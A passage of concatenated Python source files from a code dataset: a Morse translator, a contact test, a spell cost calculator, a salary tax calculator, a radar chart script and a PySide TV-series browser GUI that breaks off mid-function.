uživatelský vstup číslo\n try:\n index = int(input(\"Enter the translation number: \"))\n except ValueError:\n print(\"Not an integer!\")\n continue\n if (index == 1):\n return True\n elif (index == 2):\n return False\n else:\n continue\n\n\ndef alphabetTranslation(text):\n \"\"\"Funkce překládá z abecedy do Morseovy abecedy.\"\"\"\n result = \"\"\n for char in text.lower():\n if char in alphabetMorse:\n result += alphabetMorse[char]\n elif char == space:\n result += space\n return result\n\n\ndef morseCodeTranslation(text):\n \"\"\"Funkce překládá z Morseovy abecedy do abecedy.\"\"\"\n result = \"\"\n chars = text.split(charSeparator)\n for char in chars:\n if char in morseAlphabet:\n result += morseAlphabet[char]\n elif char == space:\n result += space\n return result\n\n\ndef translation(text, isAlphabet):\n \"\"\"Funkce překládá text z Abecedy do Morseovy abecedy a naopak.\"\"\"\n if text is None:\n return \"\"\n\n # Odstranění uvozovek na začátku a konci\n modifyText = text[1:-1].strip()\n # Kontrola prázdného řetězce\n if modifyText == \"\":\n return \"\"\n return (morseCodeTranslation(modifyText) if not isAlphabet else\n alphabetTranslation(modifyText))\n\n\ndef mainLoop(isRepeat):\n \"\"\"Funkce s logikou hlavní smyčky programu.\"\"\"\n # Menu (základní nastavení pro kódování a dekódování)\n (print(\"Welcome to the Translator!\\n\") if not isRepeat else\n print(\"Translator\\n\"))\n isAlphabet = isAlphabetTranslation()\n print()\n\n if not isAlphabet:\n print(\"Character separator \\\"|\\\".\")\n text = input(\"Enter text between \\\"\\\": \")\n print()\n\n print(\"Translation:\")\n print(translation(text, isAlphabet))\n\n\ndef run():\n \"\"\"Hlavní smyčka programu.\"\"\"\n isRepeat = False\n exitCode = 'n'\n\n # Spuštění hlavní smyčky\n while exitCode != 'y':\n mainLoop(isRepeat)\n exitCode = input(\"\\nDo you want exit program (y/n): \").lower()\n print()\n isRepeat = True\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"453159195","text":"from model.contact import Contact\nimport random\n\n\n\ndef test_delete_some_contact(app, db, check_ui):\n if len(db.get_contact_list()) == 0:\n app.contact.create(Contact(firstname=\"fjfjfj\", middlename=\"отчество\", lastname=\"фамилия\", nickname=\"вввв\", title=\"пользователь\"))\n old_contacts = db.get_contact_list()\n contact = random.choice(old_contacts)\n app.contact.delete_contact_by_id(contact.id)\n assert len(old_contacts) - 1 == app.contact.count()\n new_contacts = db.get_contact_list()\n old_contacts.remove(contact)\n assert old_contacts == new_contacts\n if check_ui:\n assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)\n\n#def test_delete_first_contact(app):\n # if app.contact.count() == 0:\n # app.contact.create(Contact(firstname=\"fjfjfj\", middlename=\"отчество\", lastname=\"фамилия\", nickname=\"вввв\", title=\"пользователь\"))\n # old_contacts = app.contact.get_contact_list()\n #app.contact.delete_first_contact()\n #assert len(old_contacts) - 1 == app.contact.count()\n #new_contacts = app.contact.get_contact_list()\n #old_contacts[0:1] = []\n #assert old_contacts == new_contacts\n\n\n\n\n\n\n","sub_path":"test/contact_tests/test_delete_contact.py","file_name":"test_delete_contact.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"341417187","text":"import math\r\n\r\nimport params\r\nimport pandas\r\n\r\nCOST_CSV = 'costs.csv'\r\nDUR_LOG_BASE = 1.2\r\n\r\n\r\ndef get_level(cost):\r\n idx = 0\r\n for boundary in params.LEVEL_BOUNDARIES:\r\n idx += 1\r\n if cost < boundary:\r\n break\r\n return idx\r\n\r\n\r\ndef get_intensity_desc(effect, intensity):\r\n if intensity >= len(params.INTENSITY_DESC[effect]):\r\n idx = -1\r\n else:\r\n idx = intensity\r\n\r\n return params.INTENSITY_DESC[effect][idx]\r\n\r\n\r\ndef is_compatible(form, effect):\r\n if effect == 'None':\r\n return True\r\n df_temp = pandas.read_csv(COST_CSV)\r\n df_cost = df_temp[df_temp[\"Rune\"] == form]\r\n\r\n return df_cost[effect].values[0] != 0\r\n\r\n\r\ndef get_duration_string(index, dur, dvar):\r\n if dur == 'None':\r\n return \"\"\r\n durstring = f\"Duration{index}: \"\r\n if dur in params.DURATION_DICT.keys():\r\n durstring += f\"{dvar} {params.DURATION_DICT[dur]}\\n\"\r\n else:\r\n durstring += f\"{dur}\\n\"\r\n return durstring\r\n\r\n\r\nclass Spell:\r\n def __init__(self, name, *args):\r\n self.name = name\r\n # print(args)\r\n self.form = args[0]\r\n self.effect = args[1]\r\n if args[2] == 'None':\r\n self.intensity = 0\r\n else:\r\n self.intensity = int(args[2])\r\n self.effect2 = args[3]\r\n if args[4] == 'None':\r\n self.intensity2 = 0\r\n else:\r\n self.intensity2 = int(args[4])\r\n self.target = args[5]\r\n self.target2 = args[6]\r\n self.attachment = args[7]\r\n self.attachment2 = args[8]\r\n self.spell_range = args[9]\r\n self.spell_range2 = args[10]\r\n self.area = args[11]\r\n self.area2 = args[12]\r\n self.delivery = args[13]\r\n self.duration = args[14]\r\n if args[15] == 'None':\r\n self.duration_var = 0\r\n else:\r\n self.duration_var = int(args[15])\r\n self.duration2 = args[16]\r\n if args[17] == 'None':\r\n self.duration_var2 = 0\r\n else:\r\n self.duration_var2 = int(args[17])\r\n self.complexity = args[18]\r\n df_temp = pandas.read_csv(COST_CSV)\r\n self.df_cost = df_temp[df_temp[\"Rune\"] == self.form]\r\n self.power_cost = self.calculate_power_cost()\r\n self.difficulty_cost = self.calculate_difficulty_cost()\r\n self.power_idx, self.difficulty_idx = \\\r\n self.modify_levels(get_level(self.power_cost), get_level(self.difficulty_cost))\r\n\r\n def calc_duration_power_cost(self):\r\n cost = self.get_dur_pow_subcost(self.duration, self.duration_var)\r\n if self.duration2 != 'None':\r\n cost += self.get_dur_pow_subcost(self.duration2, self.duration_var2)\r\n return cost\r\n\r\n def get_dur_pow_subcost(self, dur, dur_var):\r\n duration_base = self.df_cost[\"Duration\"].values[0]\r\n d_to_log = params.DURATION_COSTS[\"multiplier\"][dur] * dur_var\r\n if d_to_log == 0:\r\n duration_cost = params.DURATION_COSTS[\"no_log\"][dur]\r\n else:\r\n duration_cost = math.log(d_to_log, DUR_LOG_BASE) + 1\r\n duration_cost *= duration_base\r\n return duration_cost\r\n\r\n def calc_duration_difficulty_cost(self):\r\n return self.calc_duration_power_cost() / 2\r\n\r\n def calculate_power_cost(self):\r\n # get effect_intensity cost\r\n intsq = self.intensity ** 2\r\n ei_base = self.df_cost[self.effect].values[0]\r\n ei_cost = intsq * ei_base\r\n if self.effect2 != 'None':\r\n intsq2 = self.intensity2 ** 2\r\n ei_base2 = self.df_cost[self.effect2].values[0]\r\n ei_cost2 = intsq2 * ei_base2\r\n ei_cost = max(ei_cost, ei_cost2)\r\n # get target cost\r\n target_cost = params.TARGET_COSTS[\"power\"][self.target]\r\n if self.target2 != 'None':\r\n target_cost += params.TARGET_COSTS[\"power\"][self.target2]\r\n # get attachment cost\r\n att_cost = params.ATTACHMENT_COSTS[\"power\"][self.attachment]\r\n if self.attachment2 != 'None':\r\n att_cost += params.ATTACHMENT_COSTS[\"power\"][self.attachment2]\r\n # get range cost\r\n range_base = self.df_cost[\"Range\"].values[0]\r\n range_idx = params.RANGES.index(self.spell_range)\r\n range_cost = range_base * range_idx\r\n if self.spell_range2 != 'None':\r\n print(\"********************\")\r\n print(self.spell_range2)\r\n print(\"********************\")\r\n range_cost += range_base * params.RANGES.index(self.spell_range2)\r\n # get area cost\r\n area_base = self.df_cost[\"Area\"].values[0]\r\n area_idx = params.AREAS.index(self.area)\r\n area_cost = area_base * area_idx ** 4\r\n if self.area2 != 'None':\r\n area_cost += area_base * params.AREAS.index(self.area2) ** 4\r\n # get delivery cost\r\n delivery_cost = params.DELIVERY_COSTS[\"power\"][self.delivery]\r\n # get duration cost\r\n duration_cost = self.calc_duration_power_cost()\r\n print(\"POWER COSTS\")\r\n print(f\"ei_cost: {ei_cost}\")\r\n print(f\"target cost: {target_cost}\")\r\n print(f\"attachment cost: {att_cost}\")\r\n print(f\"range cost: {range_cost}\")\r\n print(f\"area cost: {area_cost}\")\r\n print(f\"delivery cost: {delivery_cost}\")\r\n print(f\"duration cost: {duration_cost}\")\r\n print(\"=============================\")\r\n\r\n total = ei_cost + target_cost + att_cost + range_cost + area_cost + delivery_cost + duration_cost\r\n return total\r\n\r\n def calculate_difficulty_cost(self):\r\n # get effect_intensity cost\r\n ei_base = self.df_cost[self.effect].values[0]\r\n ei_cost = self.intensity * ei_base * 2\r\n if self.effect2 != 'None':\r\n ei_base2 = self.df_cost[self.effect2].values[0]\r\n ei_cost2 = self.intensity2 * ei_base2 * 2\r\n ei_cost = ei_cost + ei_cost2\r\n # get target cost\r\n target_cost = params.TARGET_COSTS[\"difficulty\"][self.target]\r\n if self.target2 != 'None':\r\n target_cost += params.TARGET_COSTS[\"difficulty\"][self.target2]\r\n # get attachment cost\r\n att_cost = params.ATTACHMENT_COSTS[\"difficulty\"][self.attachment]\r\n if self.attachment2 != 'None':\r\n att_cost += params.ATTACHMENT_COSTS[\"difficulty\"][self.attachment2]\r\n # get range cost\r\n range_base = self.df_cost[\"Range\"].values[0]\r\n range_idx = params.RANGES.index(self.spell_range)\r\n range_cost = range_base * int(math.sqrt(range_idx))\r\n if self.spell_range2 != 'None':\r\n range_cost += self.df_cost[\"Range\"].values[0] * int(math.sqrt(params.RANGES.index(self.spell_range2)))\r\n # get area cost\r\n area_base = self.df_cost[\"Area\"].values[0]\r\n area_idx = params.AREAS.index(self.area)\r\n area_cost = area_base * area_idx ** 4\r\n if self.area2 != 'None':\r\n area_cost += self.df_cost[\"Area\"].values[0] * params.AREAS.index(self.area2) ** 2\r\n # get delivery cost\r\n delivery_cost = params.DELIVERY_COSTS[\"difficulty\"][self.delivery]\r\n # get duration cost\r\n duration_cost = self.calc_duration_difficulty_cost()\r\n print(\"DIFFICULTY COSTS\")\r\n print(f\"ei_cost: {ei_cost}\")\r\n print(f\"target cost: {target_cost}\")\r\n print(f\"attachment cost: {att_cost}\")\r\n print(f\"range cost: {range_cost}\")\r\n print(f\"area cost: {area_cost}\")\r\n print(f\"delivery cost: {delivery_cost}\")\r\n print(f\"duration cost: {duration_cost}\")\r\n print(\"==============================\")\r\n\r\n total = ei_cost + target_cost + att_cost + range_cost + area_cost + delivery_cost + duration_cost\r\n return total\r\n\r\n def modify_levels(self, power_level, difficulty_level):\r\n power_level += params.COMPLEXITY_MOD[self.complexity][0]\r\n difficulty_level += params.COMPLEXITY_MOD[self.complexity][1]\r\n return int(power_level), int(difficulty_level)\r\n\r\n def dump_spell(self):\r\n return self.name + \"\\n---------------\\n\" + self.dump_spell_without_name()\r\n\r\n def dump_spell_without_name(self):\r\n # spell_text = self.name + \"\\n---------------\\n\"\r\n spell_text = f\"Form: {self.form}\\n\"\r\n spell_text += f\"Effect: {self.effect}\\n\"\r\n spell_text += f\"Intensity: {self.intensity} --> {get_intensity_desc(self.effect, self.intensity)}\\n\"\r\n if self.effect2 != 'None':\r\n spell_text += f\"Effect2: {self.effect2}\\n\"\r\n spell_text += f\"Intensity2: {self.intensity2} - {get_intensity_desc(self.effect2, self.intensity2)}\\n\"\r\n spell_text += f\"Target: {self.target}\\n\"\r\n if self.target2 != 'None':\r\n spell_text += f\"Target2: {self.target2}\\n\"\r\n spell_text += f\"Attachment: {self.attachment}\\n\"\r\n if self.attachment2 != 'Normal':\r\n spell_text += f\"Attachment2: {self.attachment2}\\n\"\r\n spell_text += f\"Spell range: {self.spell_range}\\n\"\r\n if self.spell_range2 != 'None':\r\n spell_text += f\"Spell range2: {self.spell_range2}\\n\"\r\n spell_text += f\"Area: {self.area}\\n\"\r\n if self.area2 != 'None':\r\n spell_text += f\"Area2: {self.area2}\\n\"\r\n spell_text += f\"Delivery: {self.delivery}\\n\"\r\n spell_text += get_duration_string(\"\", self.duration, self.duration_var)\r\n spell_text += get_duration_string(\"2\", self.duration2, self.duration_var2)\r\n spell_text += f\"Complexity: {self.complexity}\\n\"\r\n spell_text += f\"Power cost: {self.power_cost:.2f}\\n\"\r\n spell_text += f\"Difficulty cost: {self.difficulty_cost:.2f}\\n\"\r\n spell_text += \"================================\\n\"\r\n spell_text += f\"Power level: {params.LEVELS[self.power_idx]}\\n\"\r\n spell_text += f\"Difficulty level: {params.LEVELS[self.difficulty_idx]}\\n\"\r\n\r\n return spell_text\r\n","sub_path":"spell.py","file_name":"spell.py","file_ext":"py","file_size_in_byte":9862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"539579880","text":"import sys\nimport os\nfrom multiprocessing import Process, Queue\n#处理参数\nclass Args():\n def __init__(self,str):\n self.args = sys.argv[1:]\n self.str = str\n#返回指定参数后的路径\n def deal_args(self):\n file = ''\n try:\n index_c = self.args.index(self.str)\n file = self.args[index_c+1]\n except Exception as e:\n print(e)\n exit()\n return file\n#处理数据\n# JiShuL = 2193.00\nclass Config_data():\n def __init__(self,path):\n self.path = path\n#处理数据并保存成为一个字典\n def save_data(self):\n config_dict = {}\n try:\n with open(self.path,'r') as f:\n for line in f.readlines():\n line = line.strip('\\n')\n key,value = line.split('=')\n key = key.strip(' ')\n value = value.strip(' ')\n config_dict[key] = value\n return config_dict\n except Exception as e:\n print(e)\n exit()\n#继承Config_data()方法\n# 101,3500\nclass User_data(Config_data):\n def save_data(self):\n data_dict = {}\n try:\n with open(self.path,'r') as f:\n for line in f.readlines():\n line = line.strip('\\n')\n key,value = line.split(',')\n data_dict[key] = value\n return data_dict\n except Exception as e:\n print(e)\n exit()\n#计算\nclass Compute():\n def __init__(self,config_dict,money):\n self.config_dict = config_dict\n self.money = money\n\n def _read_config(self,key):\n return self.config_dict[key]\n\n def compute_money(self):\n insurance_money = 0\n tax = 0\n\n try:\n money_l = float(self._read_config('JiShuL'))\n money_h = float(self._read_config('JiShuH'))\n YangLao = float(self._read_config('YangLao'))\n YiLiao = float(self._read_config('YiLiao'))\n ShiYe = float(self._read_config('ShiYe'))\n GongShang = float(self._read_config('GongShang'))\n ShengYu = float(self._read_config('ShengYu'))\n GongJiJin = float(self._read_config('GongJiJin'))\n except Exception as e :\n print(e)\n sys.exit()\n\n if self.money <= money_l :\n insurance_money = money_l*YangLao+money_l*YiLiao+money_l*ShiYe+money_l*GongShang+money_l*ShengYu+money_l*GongJiJin\n elif self.money > money_l and self.money <= money_h:\n insurance_money = self.money*YangLao+self.money*YiLiao+self.money*ShiYe+self.money*GongShang+self.money*ShengYu+self.money*GongJiJin\n elif self.money > money_h:\n insurance_money = money_h * YangLao + money_h * YiLiao + money_h * ShiYe + money_h * GongShang + money_h * ShengYu + money_h * GongJiJin\n\n money_before = self.money - insurance_money-3500\n\n if money_before <= 1500 and money_before >= 0:\n tax = money_before * 0.03\n elif money_before > 1500 and money_before <= 4500:\n tax = money_before * 0.1 - 105\n elif money_before > 4500 and money_before <= 9000:\n tax = money_before * 0.2 - 555\n elif money_before > 9000 and money_before <= 35000:\n tax = money_before * 0.25 - 1005\n elif money_before > 35000 and money_before <= 55000:\n tax = money_before * 0.3 - 2755\n elif money_before > 55000 and money_before <= 80000:\n tax = money_before * 0.35 - 5505\n elif money_before > 80000:\n tax = money_before * 0.45 - 13505\n if tax <= 0:\n tax = 0\n money = self.money - insurance_money - tax\n return format(insurance_money,'.2f'),format(tax,'.2f'),format(money,'.2f')\n\nqueue = Queue()\n\ndef read_UsrData(q):\n user_list = []\n user_path = Args('-d').deal_args()\n user_data = User_data(user_path).save_data()\n for i in user_data:\n tup = (i,user_data[i])\n user_list.append(tup)\n q.put(user_list)\n\ndef compute(q):\n user_list = q.get()\n money_list = []\n config_path = Args('-c').deal_args()\n config_data = Config_data(config_path).save_data()\n for i in user_list:\n insurance_money, tax, money = Compute(config_data,float(i[1])).compute_money()\n tup = (i[0],i[1],insurance_money,tax,money)\n money_list.append(tup)\n #print(money_list)\n q.put(money_list)\n\ndef write(q):\n money_list = q.get(True, 10)\n #print(money_list)\n try:\n final_path = Args('-o').deal_args()\n except Exception as e:\n print(e)\n sys.exit()\n if os.path.exists(final_path):\n os.remove(final_path)\n for i in money_list:\n with open(final_path, 'a') as f:\n f.write(i[0]+','+i[1]+','+i[2]+','+i[3]+','+i[4]+'\\n')\n\n#main函数\ndef main():\n\n Process(target=read_UsrData,args=(queue,)).start()\n Process(target=compute,args=(queue,)).start()\n Process(target=write,args=(queue,)).start()\n\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"base/cauculator_process.py","file_name":"cauculator_process.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"436185731","text":"# https://python-graph-gallery.com/392-use-faceting-for-radar-chart/\n#\n#\n# per_noun per_verb per_adj per_adverb\n# style \n# Brief 17.002634 15.777084 8.644375 8.481646\n# Drama 19.185251 15.481722 7.189818 5.680463\n# Epik 19.238434 16.858595 8.374700 7.617986\n# Gedicht 21.907033 12.396593 8.606924 5.365494\n# Historie 21.881628 14.877931 9.522846 6.572920\n# Nacherz 19.111306 14.417974 7.146650 6.682052\n# Philo 20.600199 15.153603 9.831002 8.378756\n#\n#\n#\n\n# Libraries\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom math import pi\n \n# Set data\ndf = pd.DataFrame({\n'Werkart': ['Gedicht', 'Philo', 'Drama', 'Epik', 'Nacherz', 'Historie', 'Brief'],\n'Substantive': [8.6, 9.8, 7.2, 8.4, 7.1, 9.5, 8.6],\n'Verben': [5.4, 8.4, 5.7, 7.6, 6.7, 6.6, 8.5],\n'Adjektive': [ 21.9, 20.6, 19.2, 19.2, 19.1, 21.9, 17],\n'Adverben': [12.4, 15.2, 15.5, 16.9, 14.4, 14.9, 15.8]\n})\n\ndf2 = df[['Substantive', 'Verben', 'Adjektive', 'Adverben']]\n# ------- PART 1: Define a function that do a plot for one line of the dataset!\n\n\ndef make_spider( row, title, color):\n # number of variable\n categories=list(df2)\n N = len(categories)\n \n # What will be the angle of each axis in the plot? (we divide the plot / number of variable)\n angles = [n / float(N) * 2 * pi for n in range(N)]\n angles += angles[:1]\n \n # Initialise the spider plot\n ax = plt.subplot(3,3,row+1, polar=True )\n \n # If you want the first axis to be on top:\n ax.set_theta_offset(pi / 2)\n ax.set_theta_direction(-1)\n \n # Draw one axe per variable + add labels labels yet\n plt.xticks(angles[:-1], categories, color='grey', size=7)\n plt.tight_layout()\n \n # Draw ylabels\n ax.set_rlabel_position(0)\n plt.yticks([10,20,30], [\"10\",\"20\",\"30\"], color=\"grey\", size=7)\n plt.ylim(0,40)\n \n # Ind1\n values=df.loc[row].drop('Werkart').values.flatten().tolist()\n values += values[:1]\n ax.plot(angles, values, color=color, linewidth=2, linestyle='solid')\n ax.fill(angles, values, color=color, alpha=0.4)\n \n # Add a title\n plt.title(title, size=12, color=color, y=1.2)\n # some spacing in between\n plt.tight_layout()\n\n\n# ------- PART 2: Apply to all individuals\n# initialize the figure\nmy_dpi=96\nplt.figure(figsize=(1000/my_dpi, 1000/my_dpi), dpi=my_dpi)\n\n# Create a color palette:\nmy_palette = plt.cm.get_cmap(\"Set2\", len(df.index))\nplt.show()\n\n# Loop to plot\nfor row in range(0, len(df.index)):\n make_spider( row=row, title=df['Werkart'][row], color=my_palette(row))\n\n","sub_path":"txt_edit/Präsentation/radar_chart.py","file_name":"radar_chart.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"115111950","text":"\n\nimport time\nfrom types import NoneType\nfrom tkFont import BOLD\n\ngrabber_app = QApplication(sys.argv)\n\nclass SeriesGrabberGUI(QWidget):\n\n def __init__(self):\n # Initialize the object\n QWidget.__init__(self)\n\n # Main Window\n self.setMinimumSize(980, 720)\n self.setWindowTitle('SeriesGrabber v0.1')\n\n\n ''' ADD SERIES WINDOW '''\n\n # Layout for finder window\n self.search_layout = QVBoxLayout()\n\n # Main Finder Window\n self.finder = QWidget()\n self.finder.resize(400, 400)\n self.finder.setWindowTitle('Add a series to your library')\n\n # Add line edit, buttons & search result list\n self.search_label = QLabel()\n self.search_label.setText(\"Search TVDB for the series you want to add:\")\n self.search_layout.addWidget(self.search_label)\n self.search_line = QLineEdit()\n self.search_layout.addWidget(self.search_line)\n self.search_layout.setAlignment(Qt.AlignTop)\n self.search_button = QPushButton()\n self.search_button.setText(\"Search\")\n self.search_button.clicked.connect(self.search_series)\n self.search_layout.addWidget(self.search_button)\n self.search_result_list = QListWidget()\n self.search_layout.addWidget(self.search_result_list)\n self.choose_selection = QPushButton()\n self.choose_selection.setText(\"Choose selected series\")\n self.choose_selection.clicked.connect(self.add_series)\n self.search_layout.addWidget(self.choose_selection)\n\n # Waiting window\n self.wait_window = QWidget()\n self.wait_window.resize(250, 50)\n self.wait_window.setWindowTitle(\"Processing...\")\n self.wait_layout = QVBoxLayout()\n self.wait_label = QLabel()\n self.wait_label.setText(\"Loading series data...\")\n self.wait_layout.addWidget(self.wait_label)\n self.wait_layout.setAlignment(Qt.AlignCenter)\n self.wait_window.setLayout(self.wait_layout)\n\n # Set finder layout\n self.finder.setLayout(self.search_layout)\n\n\n ''' MAIN WINDOW '''\n\n # Layouts\n self.layout = QHBoxLayout()\n self.left_side = QVBoxLayout()\n self.right_side = QVBoxLayout()\n self.episode_list_Layout = QHBoxLayout()\n\n ''' Left side of main window '''\n\n # List widget for series selection\n self.series_list = QListWidget(self)\n dict_series = helper.series_dict()\n items = dict_series.keys()\n self.series_list.addItems(items)\n #self.series_list.setFrameStyle(QFrame.Panel | QFrame.Plain)\n #self.series_list.setLineWidth(2)\n self.series_list.setFixedWidth(200)\n self.left_side.addWidget(self.series_list)\n\n # Button to add new series to library\n self.add_button = QPushButton(\"Add series\", self)\n self.add_button.setMinimumHeight(40)\n self.add_button.clicked.connect(self.open_finder)\n self.left_side.addWidget(self.add_button)\n\n ''' Right side of main window '''\n\n # Label for list widget\n self.banner = QLabel(self)\n self.banner.setAlignment(Qt.AlignTop)\n self.banner.setFrameStyle(QFrame.Panel | QFrame.Plain)\n self.banner.setLineWidth(2)\n self.banner.setMaximumHeight(140)\n self.right_side.addWidget(self.banner)\n\n # Label for description\n self.description = QLabel(self)\n self.description.setAlignment(Qt.AlignTop)\n self.description.setWordWrap(True)\n self.right_side.addWidget(self.description)\n\n # line1\n self.line1 = QLabel()\n self.line1.setFrameStyle(QFrame.HLine | QFrame.Plain)\n self.line1.setLineWidth(1)\n self.line1.setMaximumHeight(10)\n self.right_side.addWidget(self.line1)\n\n # ComboBox for season selection\n self.season_box = QHBoxLayout()\n self.season_capt = QLabel()\n self.season_capt.setText(\"Choose season:\")\n self.season_capt.setFixedWidth(80)\n self.season_sel = QComboBox()\n self.season_box.addWidget(self.season_capt)\n self.season_box.addWidget(self.season_sel)\n self.right_side.addLayout(self.season_box)\n\n # Episode line2\n self.line2 = QLabel()\n self.line2.setFrameStyle(QFrame.HLine | QFrame.Sunken)\n self.line2.setLineWidth(1)\n self.line2.setMaximumHeight(5)\n self.right_side.addWidget(self.line2)\n\n # Episode layout\n self.episode_list = QListWidget()\n self.episode_list_info = QVBoxLayout()\n self.episode_name = QLabel()\n self.episode_info_text = QLabel()\n self.episode_rating = QLabel()\n self.episode_airdate = QLabel()\n self.episode_banner = QLabel()\n self.episode_banner.setAlignment(Qt.AlignCenter)\n self.episode_banner.setFrameStyle(QFrame.Panel | QFrame.Plain)\n self.episode_banner.setMinimumHeight(200)\n self.hline_episode_info = QLabel()\n self.episode_download = QPushButton()\n self.episode_download.setText(\"Download now!\")\n self.episode_info_text.setWordWrap(True)\n self.episode_banner.setText(\"(No episode selected)\")\n self.episode_name.setText(\"Name: No episode selected\")\n self.episode_info_text.setText(\"Description: No episode selected\")\n self.episode_rating.setText(\"TVDB-Rating: No episode selected\")\n self.episode_airdate.setText(\"Originally aired: No episode selected\")\n self.hline_episode_info.setFrameStyle(QFrame.Panel | QFrame.Sunken)\n self.hline_episode_info.setLineWidth(1)\n self.hline_episode_info.setFixedHeight(5)\n fixedWidth = 400\n self.episode_banner.setFixedWidth(fixedWidth)\n self.episode_name.setFixedWidth(fixedWidth)\n self.episode_rating.setFixedWidth(fixedWidth)\n self.episode_info_text.setFixedWidth(fixedWidth)\n self.episode_airdate.setFixedWidth(fixedWidth)\n self.episode_list_info.addWidget(self.episode_banner)\n self.episode_list_info.addWidget(self.episode_name)\n self.episode_list_info.addWidget(self.hline_episode_info)\n self.episode_list_info.addWidget(self.episode_rating)\n self.episode_list_info.addWidget(self.episode_airdate)\n self.episode_list_info.addWidget(self.episode_info_text)\n self.episode_list_info.addWidget(self.episode_download)\n self.episode_list_info.setAlignment(Qt.AlignTop)\n self.episode_list_Layout.addWidget(self.episode_list)\n self.episode_list_Layout.addLayout(self.episode_list_info)\n self.right_side.addLayout(self.episode_list_Layout)\n\n # Bottom layout\n self.bottom_layout = QHBoxLayout()\n self.status = QLabel()\n self.rating = QLabel()\n self.delete_button = QPushButton()\n \n self.exit_button = QPushButton()\n self.status.setText(\"Current status: Continuing\")\n self.rating.setText(\"TVDB Rating: 9.0 / 10.0\")\n self.status.setFrameStyle(QFrame.Box | QFrame.Sunken)\n self.rating.setFrameStyle(QFrame.Box | QFrame.Sunken)\n self.status.setAlignment(Qt.AlignCenter)\n self.rating.setAlignment(Qt.AlignCenter)\n self.delete_button.setText(\"Delete series from library\")\n self.exit_button.setText(\"Quit\")\n self.status.setFixedHeight(40)\n self.rating.setFixedHeight(40)\n self.delete_button.setFixedHeight(40)\n self.exit_button.setFixedHeight(40)\n self.exit_button.setFixedWidth(150)\n self.bottom_layout.addWidget(self.status)\n self.bottom_layout.addWidget(self.rating)\n self.bottom_layout.addWidget(self.delete_button)\n self.bottom_layout.addWidget(self.exit_button)\n self.bottom_layout.setAlignment(Qt.AlignBottom)\n self.right_side.addLayout(self.bottom_layout)\n\n # Connect signals\n self.series_list.currentItemChanged.connect(self.change_list_selection)\n self.season_sel.currentIndexChanged.connect(self.change_season_selection)\n self.episode_list.currentItemChanged.connect(self.change_episode_selection)\n self.exit_button.clicked.connect(self.exit_app)\n self.delete_button.clicked.connect(self.delete_series)\n\n # Add layouts to main window\n self.right_side.setAlignment(Qt.AlignTop)\n self.layout.addLayout(self.left_side)\n self.layout.addLayout(self.right_side)\n\n # Set main layout\n self.setLayout(self.layout)\n \n ''' StyleSheets '''\n self.series_list.setStyleSheet(\"QListWidget { background-color: lightblue; selection-color: blue }\")\n self.series_list.setFont(QFont(\"Calibri\", 12))\n self.series_list.setMouseTracking(True)\n self.setStyleSheet(\"background-color: lightblue\")\n self.series_list.setStyleSheet(\"QListView::item:hover { background: yellow}\")\n self.wait_window.setStyleSheet(\"color: rgb(240, 172, 15)\")\n\n\n @Slot()\n def search_series(self):\n searchstring = self.search_line.text()\n if searchstring == \"\":\n self.msg = QMessageBox()\n self.msg.setWindowTitle(\"Error!\")\n self.msg.setText(\"You did not enter anything in the search line!\")\n self.msg.exec_()\n else:\n self.search_result_list.clear()\n results = seriesfinder.get_search_results(searchstring)\n self.search_result_list.addItems(results)\n\n\n @Slot()\n def add_series(self):\n selected_item = self.search_result_list.currentItem().text()\n series_dict = helper.series_dict()\n series_dict[selected_item] = \"\"\n items = series_dict.keys()\n self.series_list.clear()\n self.series_list.addItems(items)\n helper.update_series_dict(series_dict)\n self.finder.close()\n\n\n @Slot()\n def delete_series(self):\n try:\n selected_item = self.series_list.currentItem().text()\n except:\n self.msg = QMessageBox()\n self.msg.setWindowTitle(\"Error!\")\n self.msg.setText(\"An error occured while deleting you series from the library. Try again!\")\n self.msg.exec_()\n return None\n \n reply = QMessageBox.question(self, 'Message',\n \"Are you sure you want to remove \" + selected_item + \" from your library?\" , QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n\n if reply == QMessageBox.Yes:\n series_dict = helper.series_dict()\n del series_dict[selected_item]\n items = series_dict.keys()\n self.series_list.clear()\n self.series_list.addItems(items)\n helper.update_series_dict(series_dict)\n \n \n @Slot()\n def change_list_selection(self, current, previous):\n self.wait_window.show()\n try:\n previous.setFont(QFont(\"Calibri\", 12))\n except:\n pass\n self.wait_label.setText(\"Loading series data...\")\n try:\n current_sel = self.series_list.currentItem().text()\n except:\n self.wait_window.close()\n return None\n self.banner.setPixmap(seriesfinder.get_image(current_sel))\n self.description.setText(seriesfinder.get_description(current_sel))\n\n seasons = seriesfinder.get_seasons(current_sel)\n self.season_sel.clear()\n for key in seasons:\n item = str(key)\n self.season_sel.addItem(item)\n\n current_season = int(self.season_sel.currentText())\n episodes = seriesfinder.get_episodes(current_sel, current_season)\n self.episode_list.clear()\n for episode in episodes:\n episodename = seriesfinder.get_episode_name(current_sel, current_season, episode)\n if episodename == None:\n episodename = \"Unknown episode / No name returned from TVDB\"\n if episode < 10:\n episode_no = \"0\" + str(episode)\n else:\n episode_no = str(episode)\n self.episode_list.addItem(episode_no + \" \" + episodename)\n self.wait_window.close()\n current.setFont(QFont(\"Calibri\", 14, QFont.Bold))\n \n \n @Slot()\n def change_season_selection(self):\n self.wait_window.show()\n self.wait_label.setText(\"Loading series data...\")\n current_sel = self.series_list.currentItem().text()\n current_season = self.season_sel.currentText()\n if current_season == '':\n current_season = 1\n else:\n current_season = int(current_season)\n episodes = seriesfinder.get_episodes(current_sel, current_season)\n self.episode_list.clear()\n for episode in episodes:\n episodename = seriesfinder.get_episode_name(current_sel, current_season, episode)\n if episodename == None:\n episodename = \"Unknown episode / No name returned from 